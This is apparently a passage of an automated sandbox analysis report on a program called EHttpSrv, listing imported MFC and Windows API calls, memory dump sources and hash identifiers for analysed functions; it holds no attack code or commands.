                                                                                                                • Instruction Fuzzy Hash: E15148B65083419FC310EFA4C880B5BBBF5AFC9714F10D91DFA9993251D778A909CB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045B386
                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 2045B3A8
                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 2045B3E8
                                                                                                                • #2860.MFC80U(-00000002), ref: 2045B3F1
                                                                                                                • memset.MSVCR80 ref: 2045B45B
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2045B4FE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2860#314#6751memset
                                                                                                                • String ID: H
                                                                                                                • API String ID: 1096045933-2852464175
                                                                                                                • Opcode ID: 46191001adbfb0f823e1850d3ff10f7cd6632487f737781d04927b7d4074ad65
                                                                                                                • Instruction ID: 8c6d3108348b86b4f4e31ab9c5c9604d9b4c750fb206cd4083dfeed3ef3df40c
                                                                                                                • Opcode Fuzzy Hash: 46191001adbfb0f823e1850d3ff10f7cd6632487f737781d04927b7d4074ad65
                                                                                                                • Instruction Fuzzy Hash: 905191B1A04608EFDB14CF94C881BEDBBB4FB58714F10826DE915AB391D779A905CBA0
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044F299
                                                                                                                  • Part of subcall function 20462A10: EnterCriticalSection.KERNEL32(?,FEEA6C22,?,?,?,?), ref: 20462A3F
                                                                                                                  • Part of subcall function 20462A10: #280.MFC80U(?,?,00000000,?,?), ref: 20462A55
                                                                                                                  • Part of subcall function 20462A10: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 20462AD0
                                                                                                                  • Part of subcall function 20462A10: #310.MFC80U(?,00000000,?,?), ref: 20462ADE
                                                                                                                  • Part of subcall function 20462A10: #310.MFC80U(?,00000000,?,?), ref: 20462AF0
                                                                                                                  • Part of subcall function 20462A10: #4026.MFC80U(000000B7,?,00000000,?,?), ref: 20462B04
                                                                                                                  • Part of subcall function 20462A10: #4026.MFC80U(000000B2,?,00000000,?,?), ref: 20462B13
                                                                                                                  • Part of subcall function 20462A10: MessageBoxW.USER32(00000000,?,?,00000010), ref: 20462B2A
                                                                                                                  • Part of subcall function 20462A10: #578.MFC80U(?,00000000,?,?), ref: 20462B39
                                                                                                                  • Part of subcall function 20462A10: #578.MFC80U(?,00000000,?,?), ref: 20462B4B
                                                                                                                • #310.MFC80U(?,?,00003630,00003EFC,-00003E6C), ref: 2044F3C2
                                                                                                                • #4026.MFC80U(00000077,?), ref: 2044F41C
                                                                                                                • #4026.MFC80U(00000076,?), ref: 2044F46A
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 20412B10: #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
                                                                                                                  • Part of subcall function 204677A0: EnterCriticalSection.KERNEL32(-00003A6C,?,?,?,2044F2EE,?,?,00000000,00000000), ref: 204677A9
                                                                                                                  • Part of subcall function 204677A0: LeaveCriticalSection.KERNEL32(-00003A6C,-00003E44,?,2044F2EE,?,?,00000000,00000000), ref: 204677C0
                                                                                                                • #1176.MFC80U(?), ref: 2044F531
                                                                                                                • #4026.MFC80U(00000078,?), ref: 2044F5AE
                                                                                                                • #578.MFC80U(?), ref: 2044F686
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044F6B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026#764$CriticalSection$#310#578$#1176EnterLeave$#265#280#314#6751Messagememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3887008047-0
                                                                                                                • Opcode ID: b2bfdf396d9384adda82f74b60be1817eaeb1267e1407364b462e9108ef9b5fd
                                                                                                                • Instruction ID: f302d05e3825bd07ca04ebf36d67b8bda39176010dbeb0f07acd231b2700a8da
                                                                                                                • Opcode Fuzzy Hash: b2bfdf396d9384adda82f74b60be1817eaeb1267e1407364b462e9108ef9b5fd
                                                                                                                • Instruction Fuzzy Hash: D3D1DF70608305AFD314DF64C880B6BB7A1EF94B08F51CA1CF95587392DB39E906CB92
                                                                                                                APIs
                                                                                                                • #280.MFC80U(?,FEEA6C22,00000000,2047AEF9,000000FF,2042F9F3,00000000,?), ref: 2042FB2E
                                                                                                                • #899.MFC80U( ), ref: 2042FB45
                                                                                                                • #6063.MFC80U(?), ref: 2042FB52
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 2042FB5F
                                                                                                                • #578.MFC80U ref: 2042FB71
                                                                                                                • #1176.MFC80U(FEEA6C22,00000000,2047AEF9,000000FF,2042F9F3,00000000,?), ref: 2042FB89
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176#280#578#6063#899InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3088243248-399585960
                                                                                                                • Opcode ID: 4d49673be8d75949b1e1a0b5e3412ca3ff7cb27203972ef5d35702515fcf7e24
                                                                                                                • Instruction ID: b0faaa034b84c1fa1ddc5dff7bf1fca6dd93627ac5db641cbeda2d35d3c9bece
                                                                                                                • Opcode Fuzzy Hash: 4d49673be8d75949b1e1a0b5e3412ca3ff7cb27203972ef5d35702515fcf7e24
                                                                                                                • Instruction Fuzzy Hash: 88111C75104A419FC710DFA4CC94B5AB7E4FB88B14F50CA2DF556836A0DB39E905CB52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschrwcsncpy_s$wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3357641305-0
                                                                                                                • Opcode ID: c59eb458cf4fd7a1e4c4e0c0152fe135a5944002f18257d60f5f10f5d1fa1ffb
                                                                                                                • Instruction ID: 347d500640f9eb3dd12fb6016f3ea24eee86d6d7e7c2936d64b2d4fc90e8bfb9
                                                                                                                • Opcode Fuzzy Hash: c59eb458cf4fd7a1e4c4e0c0152fe135a5944002f18257d60f5f10f5d1fa1ffb
                                                                                                                • Instruction Fuzzy Hash: 9C81EFB25043068FC3289FA8CD45A9B77E6EFC8704F458A2CE985D7345EA78EA04C7D1
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,?,?,?,2047F1AF,000000FF,2043F70A,FEEA6C22,?,?,?,00000000,2047A185), ref: 2043F40F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: cb5708c9c9b3ff582acc7c17eab28571bd9283a47c901236fd4fa4bc37ebb7c4
                                                                                                                • Instruction ID: 3efddf22e9fe88da37ea4736d75f760c28e1615ed373dc71c1ed3eb50ed88554
                                                                                                                • Opcode Fuzzy Hash: cb5708c9c9b3ff582acc7c17eab28571bd9283a47c901236fd4fa4bc37ebb7c4
                                                                                                                • Instruction Fuzzy Hash: 4981CF716007068FC324CFA9CCC0B6A73E1EF98618F24CA2DE56687751DB3DE90A8B50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,?,?,?,2047F1AF,000000FF,2045043A,FEEA6C22,?,?,?,00000000,2047A185), ref: 2043FF6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 670edd4a2704a59cf25486175255d64e831be64b76b28695c064baecb1b0dc99
                                                                                                                • Instruction ID: 8a8ea7dbf020beaef21659d878ac0cab9a0894dbaac0e8260ea0df79ac10f160
                                                                                                                • Opcode Fuzzy Hash: 670edd4a2704a59cf25486175255d64e831be64b76b28695c064baecb1b0dc99
                                                                                                                • Instruction Fuzzy Hash: 6A81BCB16007068FD324CF98CCC0B6AB3E5EF84618F14CA2DE96687751EB79F9598B50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(20462D01,FEEA6C22,?,?,00000000,?,00000000,2047F1AF,000000FF,2041A362), ref: 2041B8A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 49d2aec307422f52fe82b2fe71e12b3385d92964ee4fbef3ff57010bf33b140b
                                                                                                                • Instruction ID: 20f6c94d0eb08dde5cb7aebfb320af4f62f4f4a5db1246a92f7947175b4701a5
                                                                                                                • Opcode Fuzzy Hash: 49d2aec307422f52fe82b2fe71e12b3385d92964ee4fbef3ff57010bf33b140b
                                                                                                                • Instruction Fuzzy Hash: 7D81ADB16007058FD724DFADC8C0B26B3F5EF80644F44CA2DE56687751E739E9898B91
                                                                                                                APIs
                                                                                                                • #764.MFC80U(FFF99779,FEEA6C22,00000000,2047EED7,00000058,2047EF2F,2047CFDF,000000FF,2041C7C6,FEEA6C22,00000000,00000001,?,?,?,00000000), ref: 20418C28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: de6f1d873d1550d11978b98a2f5e2c2c68958f76a2d773dc2fb0932f1842c0e0
                                                                                                                • Instruction ID: 1eb38eaf2c4cb0d48ea11dfeb7b39c37b0f203b6940a2b85bd8f1e0bfc1ecb8c
                                                                                                                • Opcode Fuzzy Hash: de6f1d873d1550d11978b98a2f5e2c2c68958f76a2d773dc2fb0932f1842c0e0
                                                                                                                • Instruction Fuzzy Hash: 2A71DFB1604B018FD328CF59DC81B26B7E2EBD4614F14C93DE56AC7BA0E738E9458B44
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,?,?,2042F9AA,?,?), ref: 2043047D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 2b8b3c20b7c852a384a2a6b9e1c18fd9497dba09e6326f44bdfedfe04e71fe7a
                                                                                                                • Instruction ID: 8c78ec8261826d180477a07e134413318fae3caf72c57858b2555c50dd82c17d
                                                                                                                • Opcode Fuzzy Hash: 2b8b3c20b7c852a384a2a6b9e1c18fd9497dba09e6326f44bdfedfe04e71fe7a
                                                                                                                • Instruction Fuzzy Hash: 887115B1B007058FC720CF99DCD0A6AB3E5EFD4608F24CA3DD55A87A11DA39F9158B10
                                                                                                                APIs
                                                                                                                • #764.MFC80U(00000000,FEEA6C22,?,?,00000000,?,00000000,2047F1AF,000000FF,2041F809), ref: 20420231
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 6f19b68813a202126c8553dd222ea916b0fc5c9c56ae0e22d2c2dfc31ac2c452
                                                                                                                • Instruction ID: 706fc76fea88a4328b3faa778fc8abdf52e572fd22f3af5435c2c6311841ff6c
                                                                                                                • Opcode Fuzzy Hash: 6f19b68813a202126c8553dd222ea916b0fc5c9c56ae0e22d2c2dfc31ac2c452
                                                                                                                • Instruction Fuzzy Hash: 6C71CFB1700B028FD324DFA8D985B16B3E5EF80608F04C92DEAA5C7796E67CF9448B51
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,00000000,?,00000000,2047F1AF,000000FF,2040E1FC), ref: 2040E48B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 809c24b8e00aee26526680ef55797c1e1d6843585da1861ac648f7d96777122c
• Instruction ID: 6f23047bb9867296087faeac3f31555e5892dd6a1e09183eccbdc6bc59c41139
• Opcode Fuzzy Hash: 809c24b8e00aee26526680ef55797c1e1d6843585da1861ac648f7d96777122c
• Instruction Fuzzy Hash: 467124B16107018FC328DFAACD81B17B7EAEBA0608F44CD3DE166A7750E63DE9158B41
APIs
• #764.MFC80U(458BFFF9,FEEA6C22,2047EED7,00000000,00000044,2047EF1B,2047CFDF,000000FF,2041C729,FEEA6C22,00000000,00000001,?,?,?,00000000), ref: 2040D648
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 4617c6d2f57dfa1dbd70defc75ce0c9091f811c6e2ab256ae7822ace62e36467
• Instruction ID: 47f74a9446ad1e2dca6a9323ce38793ef61173937e3a7c16fe38d1840842f5f4
• Opcode Fuzzy Hash: 4617c6d2f57dfa1dbd70defc75ce0c9091f811c6e2ab256ae7822ace62e36467
• Instruction Fuzzy Hash: E871C1B1604B018FE318CF59C881A16F7E6FF84218F54C93DE56A97761E73AE808CB50
APIs
• #764.MFC80U(83F0458B,FEEA6C22,2047EED7,-00000030,?,2047EF07,2047CFDF,000000FF,20418390,00000000,6FAFCF00,2041C795,FEEA6C22,00000000,00000001,?), ref: 20418818
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 83e488def0fbf84cbec5358b734d72b380ca3eb38aec3345ef1b3c280ac79953
• Instruction ID: 6e108d26ab408296e2c7771dc08ab8771c68b860efb9f62d78740de083b995c1
• Opcode Fuzzy Hash: 83e488def0fbf84cbec5358b734d72b380ca3eb38aec3345ef1b3c280ac79953
• Instruction Fuzzy Hash: 0771F4B1A04B058FC314DF69C880B2AF7E6EF80614F54C92DE46A87B51EB3DE885CB41
APIs
• #764.MFC80U(FF9A6AE8,FEEA6C22,2047EED7,-00000008,?,2047EEDF,2047CFDF,000000FF,2040D500,00000000,2047EEDF,2041C6E6,FEEA6C22,00000000,00000001,?), ref: 2040D978
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 117a10ff7036d353de076ce51dc4ca9e8d4431212e94aa7aafedbf15b2ef066e
• Instruction ID: 75967449d70f6e69711e089b3a87649a8cff60f4fe63acf095d80d0f0040ecd9
• Opcode Fuzzy Hash: 117a10ff7036d353de076ce51dc4ca9e8d4431212e94aa7aafedbf15b2ef066e
• Instruction Fuzzy Hash: 9661B3B16047058FD718DFA9C881B2AB7E2EF80614F54C92DE56687B51EB3EF909CB40
APIs
• #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CCED
• #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CD06
• #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CD1F
• #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CD38
• #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CDE2
• #265.MFC80U(00000000,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CE19
• #764.MFC80U(?,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CE53
• #265.MFC80U(00000000,?,?,00000000,00000000,2040E20D,?,?), ref: 2040CE93
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764$#265
• String ID:
• API String ID: 4171483331-0
